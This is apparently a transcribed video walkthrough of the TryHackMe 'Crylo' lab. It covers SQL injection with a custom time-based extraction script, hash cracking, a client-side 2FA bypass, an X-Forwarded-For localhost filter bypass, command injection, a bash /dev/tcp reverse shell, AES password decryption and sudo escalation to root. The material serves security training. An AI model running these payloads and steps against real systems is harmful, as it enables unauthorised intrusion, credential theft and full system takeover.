Hello YouTube, this is Ready Set Exploit, and we're going to be doing Crylo from TryHackMe, which is a fun room where we start with a web application that is vulnerable to very interesting SQL injection. We can use Sqlmap, but then we find that Sqlmap by nature does a lot of very heavy queries which can crash the server, and I like that approach because it teaches you not to rely on automated tools so much, and to be able to build manual payloads to kind of make your job a little bit easier. So from there, we get the password of a user. Well, we get the hash of a user, we crack it, and then we go ahead and have to now bypass a 2FA authentication. We do so by controlling the client-side validation script to reset the PIN, and then we go ahead, and once we're in there, we have to bypass a localhost filter. We then see that we can do command injection on a services running application, and then from there we find a encryption script in Python that does AES encryption, and then we use that to decrypt the password of another user from the database so that we can get access as that user who also happens to be in the pseudo group, and that's just an automatic win. Because we have their password. So without further ado, I'll go ahead and get started. The one thing I'm doing differently is I'm not using my Kali. I'm actually using the attack box. And the reason why I'm doing that is because, as you'll see later, when it comes to SQL injection, especially time-based injections, it is much faster on the attack box than over VPN. If you read the blog post, I did use my Kali machine there, because it didn't matter so much. So let me go ahead and get started by just enumerating open ports. We're going to do nmap dash min rate 10,000 IP address. We're going to do all ports, and we find two ports open, 80 and 22, and that should be pretty much it. Okay, I was going to start a new one, but now we can do nmap dash v SVC, that's to enumerate versions and run default scripts. That's on to save to file called nmap.txt, the IP address, and dash p 2280. And the reason why I do this is because nmal. There we go. The reason why I do this is because it's a much faster scan, since it focuses on those two ports as opposed to doing an all port scan. And it shouldn't take too long. And let's see, can I do this on the attack box? Keyboard shortcuts. Let's see, it's gotta be a way. Set title, Alt Shift S. I like that. And is there a way to do a new tab? Because let's see, new tab, Control Shift T. Okay, Control Shift T. Yeah, all right. This usually tends to close on me. Let's see, Nmap. So that way I can make this bigger. And there we go. So we have port 80, 22, Open SSH, tells us it's Ubuntu, port 80, Nginx. So we have the backend, Spicio. That's all we got. So let's check out the website. Can't really do much else on it. Something takes a little bit for Firefox to launch. It's okay. Nope. And let's see. There we go. No. We have this static site. There's not much going on. We do find a login page, but while we do that, let's go ahead and we're gonna call this one Gobuster. Whoops. So do Gobuster dir-u that wordless in the attack box is user share wordless seclist discovery. Discovery web content directory. I'm gonna use lowercase this list. I'm gonna use the small one. And another reason why I like using, when it comes to enumeration, I like using the attack box, especially if it's a lot of heavy web enumeration, because it is much faster. See, I found this took about maybe 3-4 minutes on my Kali VM. I'm gonna end it. But on here, you see it found it within seconds. And we found this debug page, which is odd, forbidden, and it's a very beautiful picture here. So we have a target. I want to get to debug somehow. We also find the login. We didn't need Gobuster for that. We have this login page, admin, and it says no. Okay, so let's see what's going on. Turn on burp and see what this page is vulnerable to. And I am going to do a combination of both Sqlmap and the manual approach. And there's a reason for it, why I sometimes like that approach. And it really comes down to the columns. Because a lot of times login pages, you know, you have 4 or 5 columns, but this one has quite a bit, which is a little obnoxious. So I believe this has, there we go. So let's just send it again, tells us no. Let's see, burp, history, there it is. So from here, let's see, we have, so usually when it comes to SQL injections or web apps, right, you don't, this looks like an upload page almost, right? But because you've seen it when you're trying to upload files. If we try any kind of thing, it gives us an error. So this is a error-based injection, or one because can we bypass it? Okay, so we know it's vulnerable to SQL injection, and we could take it from here. But you know, I want to a lot of times extract the database. To me, that's really the goal, right? I want to show whoever I'm doing this for, like, hey, it's not just a simple bypass. I can look. An attacker can extract your information, right? So there's 2 ways of doing so, right? So one way is to do union select 1, 2, and then you could just keep going up until you get a bypass. So if I try this, I get an error. This is an error base for the 3, 4, 5. You would just keep going, and you know, at some point you have to stop. Some people stop at 10. Some people stop at like 20. I tend to go up to 20. After that, I think it should be unrealistic to have 20 columns. But you never know. But at 11, we get a bypass. So we know there are 11 columns on this database. But if you really wanted to know for sure, Sqlmap can tell you this. And we could do save item, call it sql.text. And yeah. And we're going to do here, called Sqlmap. I don't know why I shouted, Sqlmap. There we go. -r SQL for the file dbs batch, right? And it's gonna go very quick. See, so if you didn't know if this was vulnerable to SQL injection, you tried Sqlmap, it would have told you anyway, right? So either way, you should have, if your approach was right, you should have derived to the same conclusion. It does take a little bit of time. There we go. So it says, it tells us that it is vulnerable to SQL injection, the username. I believe the password is 2. Do you want union characters? It tells us, confirms the backend is MySQL, which is also nice. Now we know what kind of attack to really focus on. Because, you know, there's different kind of backends. There's SQLite, Postgres. So we're starting to get a clear picture of what's happening. And it gives us a payload here. The one thing about Sqlmap, it can give you some very odd payloads. So right now this one says something with sleep. So if you want to work off a payload from Sqlmap, sometimes you have to kind of figure out what it's doing and then adjust it. But at least we have a good comparison. Does it tell us the columns? I know it does tell us the columns. So even Sqlmap seems to be a bit slow. Let's see. I thought it told us the columns. Let me see. Can I search here? 11? Oh. I don't know why that happens. And let's see. Did I lose my settings? I didn't. Great. Sqlmap. SQL text. TBS. Batch. Okay, I don't want to run Sqlmap again because it will just flood the server, and I may already have to refresh it because Sqlmap's so heavy. But it will tell you the columns. Otherwise, you could have just figured this out based on that union injection I did. But it doesn't stop there. So first thing I'm gonna do is I want to automate this, and for this I need this little token here. I need this. I also need to capture this session, but that's not too bad. Login page. All right, so let's do this. So I'm gonna build a script. We'll call SQL script. So I'm gonna do bi db. Let's see, what am I doing? Actually, I'm gonna do SQL. There we go. I'm gonna do from datetime import datetime import request. I'm gonna need that. I'm gonna import sys for two things, and I'm gonna need some regular expressions. So I want to. It's gonna be an ugly script, but it'll get the job done. So I'm gonna establish some sessions. My URL is HTTP. What is my IP address? Let's see. 10.10. Actually, what I'm gonna do is sys arg1, so that way I could just pass it on the command line in case I do crash the server at some point, which I'm sure I will. 5489. All right. So then, what else? What else do I need? So now I need my. You know what? Might as well just do it. I'm gonna terminate the machine and start it again, and so that I can start fresh. I do need my alphanumerics. So no, user share wordless secless. Is it fussing? Fussing alphanumeric case. Yeah, let's do that. Don't like that, so I'm gonna replace every line break with nothing. Alright, and then I'm going to set every space with nothing. Maybe somebody can educate me on why I can't when I use. Oh, okay, I guess not. If I don't put anything, it doesn't do it. So I have to do it this way. Sure, I'm missing something, but I need these. I like these. Let's see. Oh, no. Aha, there we go. So, there we go. I also need some special characters for a hash. Usually tend to be these. Went too far. And let's see, I'm gonna need a start. Call it I. And an empty word. And now while because I need this to cycle through a bunch of times, it's less than the length of my string there. My first request is going to be my session. And I'm gonna get my URL. And now I need to get that middleware token. Middleware, so regular expressions, find all. And this is where I need to, let's see, this page even load? 2184. It loads pretty quick, shouldn't take that much longer. And I'm gonna have to capture this request again. There we go. Turn it off for now. Let's see, where I need a cross-out request, okay, there we go. So here, I'm gonna copy this. See there, that's what I want. Yeah, that sounds good. So now I'm gonna grab everything in there. Probably should have not exited. And where does it end? It ends on, okay. So it ends on that. And that should be it. Just to make sure. Middleware, and I want that one value. First value that it finds, and then I'm gonna exit. Python 3 SQL Pi, and what's the IP address? You know what? I need to save this IP address somewhere. Let's see. What I miss? What did I miss? Oh, nah, that's what I missed. There we go. That sounds about right. All right, so we got that. Let's see. Now we can go ahead and build our payload. But not quite yet. Let's capture that login request again, because I need to be able to build it. So do admin, post, save, okay. Where, my burp go? There we go. So let's send it over and close that. We don't need that. So we already know the one payload. We need to build our database. So let's make sure we have what it needs. So union select 2, 3, 4, 5, 6, 7, 8, 9, 10, 11. Where database like binary, so this is like that's all uppercase and lowercase letter, wildcard, and actually before I do the and, so if I do this, I bypass it, but the goal is for me to be able to brute force this, and no matter what I do, it'll give me the same result. But if I do and sleep, you see that it hangs there a little bit? Now if I put the wrong letter, it doesn't sleep. So it works for a union-based injection. And this is what I'm gonna use. Let's see. And I think actually, let me copy this. I need to finish building my payload. So now we know this works. So data equals cross-site middleware token, middleware. So that'll take care of the username. And now we can copy our payload here. Password honestly doesn't matter, but I need this here. I need to build it. So it's going to be my empty word plus cycle on every letter. That's not right. There. I'm going to call this database. Not what I meant to do. And now we know it's just the password. It's honestly, I'm just going to do admin again. And that should be it. So now, I'm going to start the time. Start time equals date time dot now. Now my second request is going to be a s.post URL data equals data, redundant, and time equals date time now, and the difference is my end time minus my start time, and if the difference in total seconds is greater than 1, then we're going to do is, so if it's greater than 1, so then we know the word's a match. So my word equals the empty word. Now the word equals that new letter. We restart. And now what we want to do is, actually, yeah, it restarts. But I want to print it as it goes. So else, I'm going to do sys std standard out right. Let's see, extracting. So we do word, do al dash I, and then left adjust to 20 so that it prints out nicely, and that should be it. Let's see, yeah, there we go. I believe that should work. And then we're gonna flush it out. Standard std out flush. I really can't spell. There we go. And then we increase it by 1. I increase it by 1. I believe that looks good to me. Yeah. Let's give it a shot. Python 3. SQL py. Actually, what am I doing? I just did it. Let's see. This goes so fast. If when I was trying this on the Kali VM, it was so slow. I had to have patience. But look, the reason why I like AttackBox a lot of times. See, look how fast it's going. And there we go. We have database food. It's a good target. There you go. So it's cycling through those letters. Perfect. Probably should fix that, but I don't care. So we have our database. So I won't sit you through while I fiddle with every payload. What I am going to do is now from there, I want to extract the table names. See, so I'm going to do from information schema tables where table schema equals food. You got that. And table name, like, I shouldn't delete that, binary. And I believe, yeah, let's see, so this kind of takes the same approach. I want to fix that comment. Yeah, there you go. That's what I'll do. Table. Let's see if that, okay. And then what I'm gonna do is comment this out. It's just easier than having to. There we go. That should work. That took a second. Oh, it's taking a while. Oh, okay. So we have an C account. So it finds accounts. And just for the sake of time, I don't want to have you sit while it fiddles through this whole thing. So what I am going to do is I'm going to move the C to the N. And I'm going to move, I believe it's G, if I remember correctly. G and P. Just so you don't sit while this site goes through everything. I believe that's it. Let's give it a shot. And I might still have to restart it, but that's okay. Patience is the key here. So I don't know why it takes long on that A. Let's see, there we go. So A, next character should be U, yeah. Stops there. Let's see, A, U, T, H. So even here it takes a little time, but it would take a little longer on the Kali VM. So it's not so bad. A, T, H. And what I am gonna do, I'm gonna make a new tab. I just can't save it. As it builds out the query. So you see it goes all the way there. So we have authentication. And W. So a lot of times you can start kind of guessing where this goes. U, S, E. So what I am gonna do, we could wait it out. It's not too bad. U, sir. So now is there an S? Skip right through the S. So we know it's not there. So we can end that. So we know it's off user. Copy that, make a space there. Don't need this. Comment this. There we go. So now we can build. Now I want to find the columns, which shouldn't be too bad. Let's see. Let's see. So it should be from information schema, and we have columns where table schema equals food and table name equals off user. And let's see, column name like binary. Column name like binary. So we want to find our first one, right? And again, for the sake of time, I'm actually going to move P back to, I'll put it after you. Yeah, let's do that. Actually, I'll move them both here. Yeah, there we go. That's what I'm going to do. And you'll see why. This is just to save you time so you don't have to sit through every extraction. Because that's the one technique of this. It's fun to do it manually, right? It's, you get to practice a lot of stuff, but it can take time, especially on a busy database. But, you know, the goal is to learn, and the goal is to hopefully not crash the application. And this, it could eventually crash it if like we're dealing with some spacing issues, but when I was using Sqlmap here just to test it out, it crashed it. You know, you have to crash it, restart it. It is username. Is it an S? Is there an S in there? There isn't. So we have username, and you already know where the next one's gonna be. Put the U, the P. Whoa. Password. All right, that's not too bad. Let's see, wait, it doesn't have to be password, it could be passphrase, but it looks like it is gonna be password. So we have username and password. And now we just have to extract the final query because we have the table name and the 2 columns we want, right? Is it passwords? It's not. Perfect. So what I'm gonna do is just to be safe, I'm gonna turn it off, turn it back on, while I build this beautiful database again. There we go. So comment that out, copy that. There we go. And you could do this via burp. You don't have to do this with script, but I guarantee you it'll take so much longer. I'm gonna dump. Uncomment that. So now what do we do? How do we extract it? The payload's actually simple here. So now I want to go all the way to like binary and delete all this. So we do from, well, could do from off user where username. Now we could brute force some usernames, but I'm gonna do like binary admin and password like binary, right? And the reason why you could enumerate it, I know there's a question where it wants the username. You could almost guess it, but you know, I don't want to take too much time. Admin is a user, usually it is. You could brute force it. You would do something, you would do pretty much a username like binary. You would do this. This payload will brute force it for you, right? What I'm going to do, we're admin and password like binary, right? And the reason why I won't do it is because I'll show you later. Once you have the user and the hash, you can actually get the database information later. So it really doesn't even matter. So let's do this. So password like binary and sleep 1, and this should be it. I need a new IP address. Let's see, hopefully it loaded. I should check. Might not have loaded. I believe it does. It loads fairly quick. I don't need burp anymore. Well, for now. Let's see. Yeah, okay, let's do this. Now it's gonna take some time. And you'll see, extract. I messed something up. And select, let's see, from, I forgot my like binary. I don't think it matter. Or username, like binary, add password like binary. Yeah. Let's see, what am I missing here? Okay, so the like binary. Like binary is for lowercase letters, and I didn't have it, and that's why I didn't do it. And you see we have a pk df2. And what I love about this is that if it messes up at some point, you can just repaste it where you believe the last hash took place. It goes pretty fast through this. On the Kali VM, it took some time to get this hash. So if we look at, let's see, we should have internet connection here. Hashcat examples. Come on, what is this? I don't care for this. Sure. So let's see. What was it? PBKD? No. There's a lot of matches there. Oh. There we go. Aha. It's a Django. It's a Django hash. And if you don't know what Django is, it's like it's a framework. It's a Python framework. What is Django in Python? So it is a free and open source, a web framework. Okay, yeah. So we know it's using Nginx as the proxy. It actually doesn't tell it. We have no way of knowing. We have no way of knowing that it's using Django, except for the hash. Well, this is very helpful, just so that you know exactly what's going on the back end. So it's building the hash very nicely. Look, it's cycling through it. And we should be able to crack it. Now, that hash is tough to crack. I wonder if it has kind of word list do we have? Sec list, passwords. Let's see. Rock, you might take some time. It may not. Leak databases. Oh, okay. I wish it had the RockU like list, like the 75,000, because sometimes you want to use those. They tend to work on these lists a lot faster. We'll use RockU. It can't hurt, right? Blowing through this hash. So now we have the first salt. We should have the next salt soon once we see that, yeah, okay. So we made through this thing, and now we made through this part. Now we have the remainder of the hash. But yeah, you see, so now you can, if you're doing a web pen test or just vulnerability like testing, you can, well, not vulnerability testing, but you already proved that it's vulnerable, but now you have a proof of concept that not only can I bypass your web application person, I can extract passwords, and I can do it manually. So for example, maybe the web application has a filter against Sqlmap. Doesn't matter, because now I can extract it using a Python script. You can modify it any way you want so that it bypasses a bunch of things. So now we have a good proof of concept, and we should be done relatively soon. It's really making its way through. So let's just have Hashcat ready. Oh, I don't have it. Let's see. What else can we learn? Let's, while we do that, because it's going to take some time. I don't want to have you sit here listening to me. So I'm going to move the dock to the right. Because there's something that comes up next, and might as well get to it. This is the walkthrough after all. So one thing you'll notice, that you're going to notice once you get there, is when you get to the login page, it loads a lot of JavaScripts. Right, that it needs. Two are very interesting: AES and validation. AES, let's look at that one. open link in new tab, validation, open link in new tab. I want to look at these. So this looks like pretty. It's a Crypto.js, so it's using the Crypto.js library, which you kind of know from the room. But this is a lot going on here. But if we look at this one, now this is interesting. It's using the pulling from the crypto. It's a CVC PKCS. This is inherently vulnerable. But this looks terrible. But let's look at it better. This is interesting to me because this is where the encryption decryption happens. So it's using a decryption for the pin. But the colors are not very nice here. So let's actually go here, and if you go to debugger, go to static validation. I close this, annoying. Now we have some pretty colors here, and the lines to focus are right here, 19, right? And we have console log, the response. So we have a response here, and we get this alert. Remember, if you log in, we had the username and password is incorrect. That happens right here. Before that, though, it checks if a pin is set. So do we have a pin set? So that's good to know. Then it looks like if it's true, then it checks. It looks like it checks for the pin. If it's false, it takes us to 2FA. So it actually takes us to 2FA, redirected to 2FA. Otherwise, it takes us to a set pin, and that's going to be interesting for us. Are we finished? Oh, we're almost done. A few characters left. I hope. So this is going to be very interesting once we get here. And the reason why this is very interesting, because this looks to be happening on the client side. So if this was on the back end, we probably wouldn't be able to see the script. If it was on the back end, we have no way of controlling it. We have to find a way to control it. But this, we can control it ourselves. And I'll show you. There's a pretty neat thing about this machine. Because let's assume we can set up a breakpoint, which we can here. All right, because it's all client side. Here, we get what the result is. If we can modify this value to false using the console, then we can set a pin. Right. If the pin is not set, then it doesn't matter. As long as the username and password is correct, we'll be fine. We have it. Okay. This is the hash. I don't know why. Probably my script, but I always ignore the last character. But we have this hash here. That's nice. Hash. That's the hash of our admin. Hashcat, I think it was 10,000. Oh, let's see. Hash. User, share, wordless, rock you. Let's give it a go. It's gonna take some time. Hopefully not. Let's see. There we go. Oh, I got worried there for a sec. Or it just used force. It's booting up. Take some time. But yeah, so this is gonna be interesting to me. And let's see what happens if we even get here. Well, if I show you this, it's because we're gonna get there, right? Well, yeah, that's pretty cool. So if you were following along, you should have gotten the hash. Again, recommend using the attack box, or you can just use your own VM. That's fine too. If you don't mind waiting, and this is gonna take some time. Hopefully it doesn't take that long. If it takes too long, I'll let it run, and I know what the password is. I'll just tell you in a few seconds. But yeah, I really like this machine for that purpose. Being able to kind of, act on the spot, adjust your strategy accordingly, because not every machine is going to be designed to make it easy for you or tailor your experience. I think that's unless it's an easy machine, maybe like that's a very realistic, and it's a disservice. You're not preparing yourself for what you're gonna encounter out there. So as you can see, 12 days. That's a long time. Usually when it comes to these kinds of challenges, I give it 5 minutes, at the very best 10. You know, if it doesn't crack by then, there is a 99% chance that wasn't the step. It wasn't meant to be cracked, right? Unless there's like a hint where you have to do pass mutation or something like that. Let's see. Come on, you're almost there. You can do this. Should take. I think it takes about a minute. Could take longer. It was a minute on my VM. But you know what? We'll move forward. Well, that cracks. I'm not gonna just sit there. Let's see. So the password is actually admin and trigger. And it works. Enter your PIN. So this is set to true. We don't know the PIN, right? So let's go back. But as I showed you before, we have the validation here. I'm gonna set a breakpoint right here, right? And I am gonna need this now, and you'll see why. So let's do it again. Admin trigger. It breaks. You see paused on breakpoint. Right here we have our result, which is result email, tells us our email, success, true, pin set. So it looks a little odd, but I have that now. We go to console, we can actually set the variable. So variable result equals, oh what? Oh yeah, allow pasting. Allow pasting? It worked before, I messed up. So there, now we could do var variable result. Well, I don't want that to be the case. I want this to be false. So if we do console log result, now we have false, and we're controlling this because it's on the client side. So now we're gonna press play. Set your PIN. Now we can do 1, 2, 3, 4. Log in. It gets encrypted, as you saw. Now we don't need this anymore. Admin password. Oh wait, that's not it. Trigger. Let's check. Did that crack yet? Wow, it's still running. Yeah, I'm glad I didn't make you wait. Enter your PIN, because it is set. And look at that. We are the admin user. Can we go to debug? The message is different. Local users only. Back on burp. There's a lot of ways to bypass IP header. I don't know, GitHub. There is a lot that you can find. There's scripts. I mean, not all of them will work, and sometimes it depends how it's set. But one that always tends to work is, you could try these. You could, fuss it. But this one right here. Where we go? X forwarded for usually is a good way to bypass it, and if none of these work, then it may not work. It may need another way to bypass it. But let's see, where are we? Where to go? All right, we need this. So let's try it. Forbidden. Okay, that's all right. Yep, okay. So what I'm going to do is I'm going to do proxy settings, repeater, no, right here, match and replace. Match and replace, request header, nothing. I don't want to match anything, but I do want to add it. And now, if we refresh, we're in there. So check for open services. I don't know, 22 based on that port. It wants a port. Yeah. There we go. Post. Send this over there. Is it vulnerable to command injection? It's always a good check. It is right here. Okay. So now I want. It cracked it. There we go. Trigger. That took 4 minutes and 1 second. I'm glad I didn't make you wait. That would have been terrible. All right. So now I'm going to do another tab and do NCLVNP 9001. Getting our verse shell from here is trivial. bash-c bash-i TCP dev TCP. Our IP address. That wasn't so bad, right? It's a nice little machine. Oh my god. Okay, there we go. Should we get a response? You got it. Let's upgrade our shell. Import pty.spawn bin bash. I messed up. Python 3-c import pty, yeah, pty.spawn bin bash. Okay. I just can't spell for the life of me, that's all it is. Python 3. There we go, Control C. T-put lines, T-put calls, T-put lines, okay. Lines, T-put calls. I need, and this is so that I can have a more stty raw dash echo fg, bring that process forward, press enter twice, and now I need to match my rows and columns to my actual terminal so that it wraps around nicely. I want export terms so I can clear my screen, and there we go. We're in here, right? We are the Crylo user. Our group is data though. That's interesting. Let's look at home folders. Enough. Okay. So just wanted to check that this is actually vulnerable to OS command injection. That's the formal definition, not just command injection. So let's see. What else? I'll make sure I tackled every question indirectly. Yes. Password. Yes. Library. So from here, here's the funny thing about this machine. Let's say we wanted to find out, see, we have the settings here. Under food, settings. You know, I believe there was a question about the first username. You could guess it, but if you got to this point and you still didn't know that question or that password, because you could just do a simple bypass and get to the thing. That's, you know, the credentials are here, and you could just log in, which is what I'm gonna do. You could just log into MySQL p to the database. Look at that, and we know the database. So select all from off user. And look, there we go. Look, our database is there. Isn't that interesting? This password is interesting though. That seems encrypted. Almost seems like that pin we saw earlier. This is a hash. That's an encryption. Base 64. It's not base 64 encryption, but look at the output is base 64. This is going to be very interesting for us. Right. So see how easy how things can be. Make sure. Okay. So let's see. We can also get our user flag. I'm not going to show it. And We also need to know, let's see, group, WD, let's look at Anoff. Anoff, nothing interesting, he's just a regular user. Group. If you look at Anoff, and you would have found this out later, but Anoff is part of the pseudo group. You know, I think it's a groups. Pseudo. Oh, Anoff. You can also do on groups, Anoff, and it also tells you it's part of the pseudo group. So, you know. But now what? So we have our string here. I'm gonna save this. I don't want to keep scrolling up. String. There we go. Now what? If you're just doing your basic enumeration, let's go to accounts. You're just looking through, you would find this one right here. And this is odd. It looks like it's doing some encryption key, okay. It does some encryption based on, yeah, AES, so similar to the library. And looks like it's doing this, encrypt. So this does look like an AES encrypted string. So we have our target, so we know we have to focus on it somehow. And this is a very ugly key. You could use CyberChef, but I'm actually going to just going to take this right out of the machine. Let's see, decrypt. I don't want this. Don't need this. And I need this. Decrypt. Don't want an encryptor. I want to encrypt this. Decrypt that. And okay. I also need import base64. So data is now base64. I think it's B64 decode. Data. And let's see, I believe I need to install the library. Maybe it's already installed. It's not. Okay, so it's pipe install pycryptodon. Let's see how that works. Take some time. Yeah, there we go. So Python 3.9. Okay. Let's see. User local. Let's see. Which Python 3.9. There we go. Sometimes you have to specify the version based on how I installed it. Fine. So this is just padding. I could remove the padding, but right here there's a string, right? Let's see. Sue Anoff. That's the password. And we are a sudo user, so if we just do sudo -l, paste our password, we can run all sudo bash. We are the root user. And just like that, we clear this machine. So the toughest part was honestly the entry point, but it wasn't so bad. Once you identify it, it's just a matter of patience. Just patience, you know, extracting it little by little, you know. Pen test is about patience, so they both start with the letter P. And once you're on there, you know, you find your momentum, and the rest, this last part was just enumerating, trying to put pieces together, you know. But that's the machine. Feel free to comment, like, and subscribe, and see you all next time.